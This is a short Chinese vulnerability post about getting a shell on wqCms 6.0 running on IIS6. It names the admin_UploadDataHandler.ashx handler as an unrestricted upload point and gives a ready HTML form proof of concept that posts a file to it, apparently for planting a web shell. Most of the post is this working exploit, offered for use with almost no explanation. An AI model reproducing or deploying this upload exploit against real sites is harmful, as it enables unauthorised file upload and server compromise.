wqCms6.0在IIS6的Getshell
2017-02-15发布
一、漏洞利用点
漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点
二、hack it
三、POC
<html>
<body>
<form action="http://127.0.0.1/admin_UploadDataHandler.ashx" method="POST"enctype="multipart/form-data">
<input type="file" name="uploadify" />
<input type="text" name="saveFile" value="admin" />
<input type="submit" name="Upload" value="Submit Query" />
</form>
</body>
</html>
转自群友论坛文章wobushou